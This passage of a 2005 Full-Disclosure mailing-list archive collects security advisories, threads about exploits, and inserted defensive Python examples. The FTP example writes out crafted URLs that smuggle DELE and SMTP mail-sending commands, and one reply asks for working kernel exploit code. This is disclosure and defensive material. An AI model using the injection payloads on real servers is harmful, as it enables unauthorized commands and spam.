  *>= 3.2.3-r3
---
 2 affected packages on all of their supported architectures.
---

Description
===

KPdf and KOffice both include Xpdf code to handle PDF files. Xpdf is
vulnerable to multiple new integer overflows, as described in GLSA
200412-24.

Impact
==

An attacker could entice a user to open a specially-crafted PDF file,
potentially resulting in the execution of arbitrary code with the
rights of the user running the affected utility.

Workaround
==

There is no known workaround at this time.

Resolution
==

All KPdf users should upgrade to the latest version of kdegraphics:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdegraphics

Note: There is currently no fixed stable 3.3.x version for sparc.

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose app-office/koffice

References
==

  [ 1 ] GLSA 200412-24
http://www.gentoo.org/security/en/glsa/glsa-200412-24.xml
  [ 2 ] CAN-2004-1125
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1125
  [ 3 ] KDE Security Advisory: kpdf Buffer Overflow Vulnerability
http://kde.org/info/security/advisory-20041223-1.txt
  [ 4 ] KOffice XPDF Integer Overflow 2
http://koffice.kde.org/security/2004_xpdf_integer_overflow_2.php

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgppLlGtvnVOx.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote UniversalExploit

2005-01-11 Thread class 101



You can get my clean code there:
dfind.kd-team.com
Bye and good urgent patching ;)
-class101 Hat-Squad.com-

  - Original Message -
  From: class 101
  To: full-disclosure@lists.netsys.com ; bugtraq@securityfocus.com
  Sent: Tuesday, January 11, 2005 12:39 PM
  Subject: [Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote UniversalExploit
  

[Full-Disclosure] [ GLSA 200501-18 ] KDE FTP KIOslave: Command injection

2005-01-11 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: KDE FTP KIOslave: Command injection
  Date: January 11, 2005
  Bugs: #73759
ID: 200501-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The FTP KIOslave contains a bug allowing users to execute arbitrary FTP
commands.

Background
==

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. KDE provides KIOslaves for many protocols
in the kdelibs package, one of them being FTP. These are used by KDE
applications such as Konqueror.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  kde-base/kdelibs < 3.3.2-r2   >= 3.3.2-r2
  *>= 3.2.3-r5

Description
===

The FTP KIOslave fails to properly parse URL-encoded newline
characters.

Impact
==

An attacker could exploit this to execute arbitrary FTP commands on the
server. Because the FTP and SMTP protocols are similar (both are
line-oriented text commands), this vulnerability also allows an attacker to
connect to an SMTP server and issue arbitrary commands, for example sending
an email.
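A model of the bug and its fix, added here as an example and not the kdelibs code (which is not reproduced): a naive client percent-decodes the path of an ftp:// URL and turns it into FTP commands without rejecting CR or LF, so %0a inside a path component becomes a line break on the wire and the server reads what follows as a separate command. The same CRLF-delimited stream sent to port 25 is an SMTP dialogue once the server has rejected the leading RETR. The hardened variant refuses any component containing a control character. The URLs are constructed; host and port are outside this model.

```python
"""FTP command injection via a percent-encoded newline in an ftp:// URL path
(added example; a simplified client model, not the kdelibs KIOslave code)."""
from urllib.parse import unquote

CRLF = "\r\n"


def ftp_commands_for_url_path(url_path, reject_control=False):
    """Turn the path of an ftp:// URL into the commands a naive client issues:
    CWD into each directory component, then RETR the last one. With
    reject_control=True a component containing CR or LF is refused, which is
    the shape of the fix (the real kdelibs patch is not reproduced here)."""
    components = [unquote(c) for c in url_path.split("/") if c]
    if reject_control:
        for c in components:
            if "\r" in c or "\n" in c:
                raise ValueError(f"control character in path component: {c!r}")
    commands = [f"CWD {c}" for c in components[:-1]]
    if components:
        commands.append(f"RETR {components[-1]}")
    return commands


def as_server_sees(commands):
    """Join the commands with CRLF as they go on the wire, then split the
    stream the way an FTP or SMTP server does: one command per line, with a
    bare LF accepted as a terminator. This is the list that actually runs."""
    wire = CRLF.join(commands) + CRLF
    return [line.rstrip("\r") for line in wire.split("\n") if line.rstrip("\r")]


def path_is_safe(url_path):
    """True if the hardened client would accept this path."""
    try:
        ftp_commands_for_url_path(url_path, reject_control=True)
        return True
    except ValueError:
        return False


# Constructed URLs (paths only).
BENIGN = "/pub/README"
# %0a is LF: the 'file name' smuggles a DELE before the RETR the user intended.
INJECTED = "/pub/%0aDELE%20important.dat%0aREADME"
# Same trick against port 25: after the server rejects 'RETR ', the rest is a
# valid SMTP dialogue that sends a mail.
SMTP_ABUSE = ("/%0aHELO%20x%0aMAIL%20FROM%3A%3Ca%40example.net%3E"
              "%0aRCPT%20TO%3A%3Cb%40example.net%3E%0aDATA%0aspam%0a.%0aQUIT")

if __name__ == "__main__":
    for path in (BENIGN, INJECTED, SMTP_ABUSE):
        print(path, "->", as_server_sees(ftp_commands_for_url_path(path)))
        print("  accepted by hardened client:", path_is_safe(path))
```

The decoded path must be validated after percent-decoding and before it is placed into a protocol line; checking the still-encoded URL, or only the host part, misses exactly this case.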

Workaround
==

There is no known workaround at this time.

Resolution
==

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable 3.3.x version for sparc.

References
==

  [ 1 ] KDE Security Advisory: ftp kioslave command injection
http://www.kde.org/info/security/advisory-20050101-1.txt
  [ 2 ] CAN-2004-1165
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1165

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


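The bug class behind this advisory is worth seeing in code: a percent-encoded CR/LF in an ftp:// URL survives URL decoding and, if the decoded path is spliced straight into a command, reaches the FTP control connection as a second command. The following is an added example, not kdelibs or KDE code, showing the vulnerable shape next to the check that stops it; the host names, the crafted URL (which only appends a harmless NOOP) and the blocked-port list are constructed for illustration.

```python
# Added example (not KDE/kdelibs code): URL-encoded newline reaching an FTP
# control connection, and the post-decoding validation that prevents it.
from urllib.parse import urlsplit, unquote

# Bytes that must never appear inside an FTP command argument: CR and LF
# terminate a command, so either lets a path carry additional commands;
# NUL truncates C strings and hides whatever follows from length checks.
FORBIDDEN = frozenset("\r\n\0")

# A generic fetcher should also refuse ftp:// to ports of unrelated
# line-oriented services. Assumption: a minimal list for illustration, SMTP
# being the case the advisory's Impact section describes.
BLOCKED_PORTS = frozenset({25, 587})


def build_retr_unchecked(url: str) -> str:
    """Vulnerable shape: decode the URL path and splice it into a command."""
    path = unquote(urlsplit(url).path)
    return f"RETR {path}\r\n"


def build_retr_checked(url: str) -> str:
    """Hardened shape: validate the *decoded* path, then build the command."""
    parts = urlsplit(url)
    if parts.scheme != "ftp":
        raise ValueError(f"unexpected scheme {parts.scheme!r}")
    if parts.port in BLOCKED_PORTS:
        raise ValueError(f"refusing ftp to port {parts.port}")
    path = unquote(parts.path)               # check AFTER decoding, never before
    bad = FORBIDDEN.intersection(path)
    if bad:
        raise ValueError("control characters in decoded path: "
                         + ", ".join(hex(ord(c)) for c in sorted(bad)))
    return f"RETR {path}\r\n"


def command_count(wire: str) -> int:
    """How many commands an FTP server would parse out of this string."""
    return sum(1 for line in wire.split("\r\n") if line)


def is_rejected(url: str) -> bool:
    """True when the hardened builder refuses the URL."""
    try:
        build_retr_checked(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    benign = "ftp://ftp.example.invalid/pub/readme.txt"
    # Constructed: the path ends in an encoded CR LF followed by a harmless NOOP.
    crafted = "ftp://ftp.example.invalid/pub/readme.txt%0D%0ANOOP"
    wire = build_retr_unchecked(crafted)
    print("unchecked:", repr(wire), "->", command_count(wire), "commands")
    print("checked benign:", repr(build_retr_checked(benign)))
    print("checked crafted rejected:", is_rejected(crafted))
    print("checked port 25 rejected:", is_rejected("ftp://ftp.example.invalid:25/x"))
```

The important detail is the order of operations: the check runs on the decoded string, because a filter applied to the still-encoded URL sees only `%0D%0A` and passes it.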


Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread Athanasius
On Tue, Jan 11, 2005 at 07:56:32AM +, Marcy Darcy wrote:
> I'm running a small server with the 2.6.10 kernel.
> 
> The exploit doesn't seem to be working on this kernel. Is there a way
> to make sure the system is vulnerable or not?

  I couldn't get the exploit to work for 2.6.10 either.  First there's
changing a struct in it to user_desc to make it compile, then it just
SEGVs all the time here.
  This is quite apart from the fact it's trying to exploit a race
condition and as such can take a lot of attempts in a loop to actually
work anyway (must have hit it on the 50th or more iteration on my 2.4.28
machine).
  Anyone got working exploit code for 2.6.10 ?

-Ath
-- 
- Athanasius = Athanasius(at)miggy.org / http://www.miggy.org/
  Finger athan(at)fysh.org for PGP key
   "And it's me who is my enemy. Me who beats me up.
Me who makes the monsters. Me who strips my confidence." Paula Cole - ME




RE: [Full-Disclosure] Firespoofing [Firefox 1.0]

2005-01-11 Thread Soderland, Craig
This does not work if you are using the FireFox 1.0 tabbed browsing
feature, as your pop up window simply opens a new tab, and it then
becomes immediately obvious what you are trying to pull off here. 



> -Original Message-
> From: [EMAIL PROTECTED]
[mailto:full-disclosure-
> [EMAIL PROTECTED]
> Sent: Monday, January 10, 2005 6:22 PM
> To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
> [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Firespoofing [Firefox 1.0]
> 
> __Summary
> 
> Using javascript it is possible to spoof the content of security and
> download dialogs by partly covering them with a popup window. This can
> fool
> a user to download and automatically execute a file (if a file extension
> association exists) or to grant a script local data access (if
codebase
> principals are enabled).
> 
> __Expected Behavior
> 
> Modal dialogs should always be on top and it should not be possible to
> obfuscate their appearance.
> 
> __Proof-of-Concept
> 
> http://www.mikx.de/firespoofing/
> 
> The PoC is designed for Firefox 1.0 running in a maximized window.
> 
> Part 1 - download dialog spoofing
> Shows how to cover a download dialog and fool the user to execute a
file
> with a standard windows file association (in this case a .ht file).
BTW,
> remember the latest .ht buffer overflow...
> 
> Part 2 - security dialog spoofing
> Shows how to cover a security dialog. Make sure codebase principals
are
> enabled (not default but encouraged by many XUL sites). Creates the
file
> c:\booom.txt to prove local system access.
> 
> __Status
> 
> The bug is confirmed but currently unfixed (open for more than 3
months).
> As
> a partial workaround set dom.disable_window_flip to true in
about:config.
> The vendor failed to respond to multiple status requests which led to
this
> public disclosure.
> 
> 2004-09-20 Vendor informed (bugzilla.mozilla.org #260560)
> 2004-09-20 Vendor confirmed bug
> 2004-10-20 Status request (open for 1 month - no reply)
> 2005-01-03 Status request (open for 3 months - no reply)
> 2005-01-07 Status request (disclosure warning - no reply)
> 2005-01-11 Public disclosure
> 
> __Affected Software
> 
> Tested with Firefox 1.0, Mozilla 1.7.5 and Netscape 7.1 on Windows XP
SP2.
> 
> __Contact Information
> 
> Michael Krax <[EMAIL PROTECTED]>
> http://www.mikx.de/?p=7
> 
> mikx
> 
> 


[Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread Mike Diack
Where are they?
Mike


Re: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow

2005-01-11 Thread stonersavant
I tested this in my lab. I'm happy to report that s10.5 Ninja Tabi
boots appear to be unaffected by the vulnerability.

savant
http://johnny.ihackstuff.com

On Sun, 26 Dec 2004 19:45:54 -0500, Nancy Kramer
<[EMAIL PROTECTED]> wrote:
> The points on cowboy boots are also great for stepping on cockroaches in
> corners thereby helping one maintain a bug free environment.
> 
> Regards,
> 
> Nancy Kramer
> Webmaster http://www.americandreamcars.com
> Free Color Picture Ads for Collector Cars
> One of the Ten Best Places To Buy or Sell a Collector Car on the Web
> 
> 
> At 06:49 PM 12/25/2004, Thomas Sutpen wrote:
> 
> >On Wed, 22 Dec 2004 11:20:45 -0500, [EMAIL PROTECTED] <[EMAIL PROTECTED]>
> >wrote:
> >[...]
> > >  Vulnerable Sizes:
> > >  -
> > >  6 through 13. Other sizes may be vulnerable, but were unavailable for
> > testing.
> >
> >Cursory note:  The guy with the size 13s must get all the chicks.  You
> >know what they say 
> >
> >[...]
> >
> > >  Fix:
> > >  
> > >  Do not wear untrusted shoes sent to you. Other possible workarounds
> > include
> > >  sandals (aka. flip-flops). These are a good work-around and are widely
> > >  available for those concerned about their security.
> >
> >Merrell also makes a "Jungle Moc" that is a mitigating factor to this
> >vulnerability.  All shoes of similar "Moccasin" styles, as well as
> >Cowboy Boots, also seem to be unaffected.  Cowboy Boots with spurs
> >seem to add an additional layer of security, as well as cool points.
> >
> >Review of their website seems to indicate that they're going to be
> >discontinuing the line, though.  So, with Boxing Day tomorrow, I'd
> >recommend snapping up a few pairs as a cautionary posture against the
> >possibility of future attacks.
> >
> >[...]
> >
> >TS
> >
> >
> >
> >
> 
> 
> 
> 
> 
> 


-- 
someone is watching you.


[Full-Disclosure] [OpenPKG-SA-2005.001] OpenPKG Security Advisory (perl)

2005-01-11 Thread OpenPKG
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html  http://www.openpkg.org
[EMAIL PROTECTED] [EMAIL PROTECTED]
OpenPKG-SA-2005.001  11-Jan-2005


Package: perl
Vulnerability:   information disclosure, insecure permissions
OpenPKG Specific:no

Affected Releases:   Affected Packages:  Corrected Packages:
OpenPKG CURRENT  <= perl-5.8.6-20041129  >= perl-5.8.6-20050111
OpenPKG 2.2  <= perl-5.8.5-2.2.0 >= perl-5.8.5-2.2.1
OpenPKG 2.1  <= perl-5.8.4-2.1.0 >= perl-5.8.4-2.1.1

Dependent Packages:  none

Description:
  Jeroen van Wolffelaar discovered that the rmtree() function in the
  Perl [0] File::Path module removes directory trees in an insecure
  manner which could lead to the removal of arbitrary files and
  directories through a symlink attack. The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CAN-2004-0452 [1] to the
  problem.

  Trustix developers discovered several insecure uses of temporary files
  in many modules which allow a local attacker to overwrite files via a
  symlink attack. The Common Vulnerabilities and Exposures (CVE) project
  assigned the id CAN-2004-0976 [2] to the problem.

  Please check whether you are affected by running "/bin/openpkg
  rpm -q perl". If you have the "perl" package installed and its version
  is affected (see above), we recommend that you immediately upgrade it
  (see Solution) [3][4].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [5][6], fetch it from the OpenPKG FTP service [7][8] or a mirror
  location, verify its integrity [9], build a corresponding binary RPM
  from it [3] and update your OpenPKG installation by applying the
  binary RPM [4]. For the most recent release OpenPKG 2.2, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.2/UPD
  ftp> get perl-5.8.5-2.2.1.src.rpm
  ftp> bye
  $ /bin/openpkg rpm -v --checksig perl-5.8.5-2.2.1.src.rpm
  $ /bin/openpkg rpm --rebuild perl-5.8.5-2.2.1.src.rpm
  $ su -
  # /bin/openpkg rpm -Fvh /RPM/PKG/perl-5.8.5-2.2.1.*.rpm


References:
  [0] http://www.perl.com/
  [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0452
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0976
  [3] http://www.openpkg.org/tutorial.html#regular-source
  [4] http://www.openpkg.org/tutorial.html#regular-binary
  [5] ftp://ftp.openpkg.org/release/2.2/UPD/perl-5.8.5-2.2.1.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.1/UPD/perl-5.8.4-2.1.1.src.rpm
  [7] ftp://ftp.openpkg.org/release/2.2/UPD/
  [8] ftp://ftp.openpkg.org/release/2.1/UPD/
  [9] http://www.openpkg.org/security.html#signature


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.


-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFB4+wMgHWT4GPEy58RAmB8AJ9RXjXuF4foXhhDAvR4KRRJ31dUBwCg6pRb
TZQ44p6zfBdfieRvvcf3QLo=
=CkBO
-----END PGP SIGNATURE-----
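Both problems in this advisory are symlink races: a recursive delete or a temporary-file writer that resolves a path a local user can redirect. The following is an added example, not Perl's File::Path nor OpenPKG code, contrasting the fragile path-based recursion with a delete that works relative to directory descriptors it opened itself (dir_fd plus O_NOFOLLOW, so POSIX only) and therefore never enters a directory through a link. The directory layout built by the demo is constructed for illustration.

```python
# Added example (not File::Path or OpenPKG code): symlink-safe recursive
# delete using directory descriptors, next to the naive shape it replaces.
import os
import shutil
import stat
import tempfile


def naive_rmtree(path: str) -> None:
    """Fragile shape: path-based recursion. os.path.isdir() follows symlinks,
    so a link planted inside `path` makes this descend into, and empty, a
    directory the caller never meant to touch."""
    for name in os.listdir(path):
        child = os.path.join(path, name)
        if os.path.isdir(child):
            naive_rmtree(child)
            os.rmdir(child)           # fails on the link itself, but too late
        else:
            os.unlink(child)


def _rmtree_at(dir_fd: int, name: str) -> None:
    """Remove `name` relative to an already-open directory descriptor."""
    st = os.lstat(name, dir_fd=dir_fd)          # never follows a link
    if not stat.S_ISDIR(st.st_mode):
        os.unlink(name, dir_fd=dir_fd)          # files AND links: unlinked, not entered
        return
    flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    fd = os.open(name, flags, dir_fd=dir_fd)    # fails if swapped for a link meanwhile
    try:
        fst = os.fstat(fd)                      # what we hold must be what we stat'ed
        if (fst.st_dev, fst.st_ino) != (st.st_dev, st.st_ino):
            raise RuntimeError(f"{name!r} changed between lstat and open")
        for child in os.listdir(fd):            # listdir on the descriptor we hold
            _rmtree_at(fd, child)
    finally:
        os.close(fd)
    os.rmdir(name, dir_fd=dir_fd)


def safe_rmtree(path: str) -> None:
    """Delete `path` and everything below it without ever following a symlink."""
    parent, name = os.path.split(os.path.abspath(path))
    parent_fd = os.open(parent, os.O_RDONLY | os.O_DIRECTORY)
    try:
        _rmtree_at(parent_fd, name)
    finally:
        os.close(parent_fd)


def _build_scenario():
    """Constructed layout: root/victim/important.txt must survive;
    root/target is the tree being deleted and contains a link to victim."""
    root = tempfile.mkdtemp(prefix="rmtree-demo-")
    victim = os.path.join(root, "victim")
    os.mkdir(victim)
    keep = os.path.join(victim, "important.txt")
    with open(keep, "w") as f:
        f.write("must survive\n")
    target = os.path.join(root, "target")
    os.makedirs(os.path.join(target, "sub"))
    open(os.path.join(target, "sub", "junk.txt"), "w").close()
    os.symlink(victim, os.path.join(target, "evil"))    # the planted link
    return root, target, keep


def demo(remover) -> dict:
    """Run `remover` on the target tree and report what happened to the victim."""
    root, target, keep = _build_scenario()
    try:
        try:
            remover(target)
            error = None
        except OSError as exc:
            error = type(exc).__name__
        return {
            "victim_intact": os.path.exists(keep),
            "target_removed": not os.path.lexists(target),
            "error": error,
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print("naive:", demo(naive_rmtree))
    print("safe: ", demo(safe_rmtree))
```

The same idea applies to the temporary-file half of the advisory: open with O_CREAT|O_EXCL (or use a library that does, such as File::Temp) so an existing link at the chosen name is an error rather than a redirect.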


[Full-Disclosure] [ GLSA 200501-19 ] imlib2: Buffer overflows in image decoding

2005-01-11 Thread Dan Margolis
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: imlib2: Buffer overflows in image decoding
  Date: January 11, 2005
  Bugs: #77002
ID: 200501-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple overflows have been found in the imlib2 library image decoding
routines, potentially allowing the execution of arbitrary code.

Background
==

imlib2 is an advanced replacement for image manipulation libraries such
as libXpm. It is utilized by numerous programs, including gkrellm and
several window managers, to display images.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  media-libs/imlib2   < 1.2.0  >= 1.2.0

Description
===

Pavel Kankovsky discovered that several buffer overflows found in the
libXpm library (see GLSA 200409-34) also apply to imlib (see GLSA
200412-03) and imlib2. He also fixed a number of other potential
security vulnerabilities.

Impact
==

A remote attacker could entice a user to view a carefully-crafted image
file, which would potentially lead to the execution of arbitrary code
with the rights of the user viewing the image. This affects any program
that utilizes the imlib2 library.

Workaround
==

There is no known workaround at this time.

Resolution
==

All imlib2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/imlib2-1.2.0"

References
==

  [ 1 ] CAN-2004-1026
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1026
  [ 2 ] GLSA 200412-03
http://security.gentoo.org/glsa/glsa-200412-03.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-19.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0





Re: [Full-Disclosure] Firespoofing [Firefox 1.0]

2005-01-11 Thread James Greenhalgh
Soderland, Craig wrote:
> This does not work if you are using the FireFox 1.0 tabbed browsing
> feature, as your pop up window simply opens a new tab, and it then
> becomes immediately obvious what you are trying to pull off here. 
It also doesn't work on non-Windows or with non-default colours.
Really - this is more a window management thing surely?  If someone fell 
for this, they'd deserve it to be honest.


[Full-Disclosure] [ GLSA 200501-20 ] o3read: Buffer overflow during file conversion

2005-01-11 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: o3read: Buffer overflow during file conversion
  Date: January 11, 2005
  Bugs: #74478
ID: 200501-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in o3read allows an attacker to execute arbitrary
code by way of a specially crafted XML file.

Background
==

o3read is a standalone converter for OpenOffice.org files. It allows a
user to dump the contents tree (o3read) of Writer and Calc files and to
convert them to plain text (o3totxt) or to HTML (o3tohtml).

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  app-text/o3read  <= 0.0.3>= 0.0.4

Description
===

Wiktor Kopec discovered that the parse_html function in o3read.c copies
any number of bytes into a 1024-byte t[] array.

Impact
==

Using a specially crafted file, possibly delivered by e-mail or over
the Web, an attacker may execute arbitrary code with the permissions of
the user running o3read.

Workaround
==

There is no known workaround at this time.

Resolution
==

All o3read users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/o3read-0.0.4"

References
==

  [ 1 ] CAN-2004-1288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1288
  [ 2 ] Wiktor Kopec advisory
http://tigger.uic.edu/~jlongs2/holes/o3read.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-20.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0





Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread Gaz Wilson
On Tue, 11 Jan 2005, Athanasius wrote:

> On Tue, Jan 11, 2005 at 07:56:32AM +, Marcy Darcy wrote:
> > I'm running a small server with the 2.6.10 kernel.
> >
> > The exploit doesn't seem to be working on this kernel. Is there a way
> > to make sure the system is vulnerable or not?
>
>   I couldn't get the exploit to work for 2.6.10 either.  First there's
> changing a struct in it to user_desc to make it compile, then it just
> SEGVs all the time here.

I get it compiled and running on 2.6.8, but it doesn't do anything, other
than hog all available CPU for about 10-15 minutes followed by:

[-] FAILED: try again (-f switch) and again (Cannot allocate memory)
Killed

The same thing happens with the -f switch, except the process gets stopped
(SIGSTOP) instead of killed after the allotted time.

-- 
   /   Gary Wilson, aka dragon/dragonlord/dragonv480\
 .'(_.--.  e: [EMAIL PROTECTED] MSN: dragonv480   .--._)`.
<   _   |  Skype:dragonv480 ICQ:342070475 AIM:dragonv480   |   _   >
 `.( `--' w: http://volvo480.northernscum.org.uk   `--' ).'
   \w: http://www.northernscum.org.uk   /


Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

2005-01-11 Thread Rafel Ivgi
The original file wasn't a 1.56 with nulls that were compressed, it was a 
small file with 1024 FF's which was extracted to a
1.56 of nulls...that is not obvious, that is a bug.

Rafel Ivgi
Security Consultant
- Original Message - 
From: "bipin gautam" <[EMAIL PROTECTED]>
To: 
Sent: Saturday, January 08, 2005 11:29 AM
Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB


that's obvious isn't it... say... if you create a few
GB file with null characters, 0X00 and compress
it.. that will produce a similar result. such
issue is known for any file compress utility for ages.
any... software will do the same! try it. and THAT'S
OBVIOUS!
--- "Rafel Ivgi, The-Insider" <[EMAIL PROTECTED]>
wrote:

~~~
Application:WinHKI
Vendors:http://www.webtoolmaster.com
Versions:   1.4d
Platforms:  Windows
Bug:ARC File Extraction of 1KB to 1.56GB
Exploitation:   Local (extract file)
Date:   24 Dec 2004
Author: Rafel Ivgi, The-Insider
E-Mail: [EMAIL PROTECTED]
Website:http://theinsider.deep-ice.com

~~~
1) Introduction
2) Bugs
3) The Code

~~~
===
1) Introduction
===
WinHKI is a file archiver which supports: ARC, BH,
CAB, HKI, JAR, LHA,TAR,
GZ compressions.

~~~
==
2) Bug
==
This is a normal CAB compressed file header
 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
..251.HTM.^.
0010  0078 3139 73B5 121B  003C 7363
...x19s..alert()
By adding after the filename header a certain amount
of chars
and replacing all nulls (00) with FF (in order to
avoid our
long string from being terminated)
 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
..251.HTM.^.
0010        

0020        

0030        

0040        

0050        

0060        

0070        

0080        

0090        

00A0        

00B0        

00C0        

00D0        

00E0        

00F0        

0100        

0110        

0120        

0130        

0140        

0150        

0160        

0170        

0180        

0190        

01A0        

01B0        

01C0        

01D0        

01E0        

01F0        

0200        

0210        

0220        

0230        

0240        

0250        

0260        

0270        

0280        

0290        

02A0        

02B0        

02C0        

02D0        

02E0        
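Whichever side of this thread one takes, the operational concern is the same: an extractor that will write 1.56 GB on behalf of a 1 KB input needs an output cap, and the cap must be enforced while inflating, not after. The following is an added example, not WinHKI code and not tied to the ARC format: a bounded inflate over a zlib (deflate) stream that stops at an absolute output size and at an output-to-input ratio. The limits, the all-zero "bomb" and the log-like sample are constructed for illustration.

```python
# Added example (not WinHKI code): decompression guard with an absolute
# output cap and a ratio cap, both checked while inflating.
import zlib


class DecompressionLimitExceeded(Exception):
    """Raised as soon as either limit is hit, before more output is produced."""


def bounded_inflate(data: bytes, max_out: int, max_ratio: float = 100.0,
                    chunk: int = 4096) -> bytes:
    """Inflate `data`, refusing to produce more than `max_out` bytes or more
    than `max_ratio` output bytes per input byte consumed so far.

    The output budget is passed to zlib as max_length, so a bomb is stopped
    after `max_out` bytes instead of being expanded in full and then measured."""
    d = zlib.decompressobj()
    out = bytearray()
    view = memoryview(data)
    pos = fed = 0
    while pos < len(view) or d.unconsumed_tail:
        if d.unconsumed_tail:                   # leftover from a capped call
            piece = d.unconsumed_tail
        else:
            piece = view[pos:pos + chunk]
            pos += len(piece)
            fed += len(piece)
        budget = max_out - len(out)
        # max(budget, 1): with the budget spent we still allow one probe byte, so an
        # input that fits exactly (only the trailer left) is not rejected by mistake.
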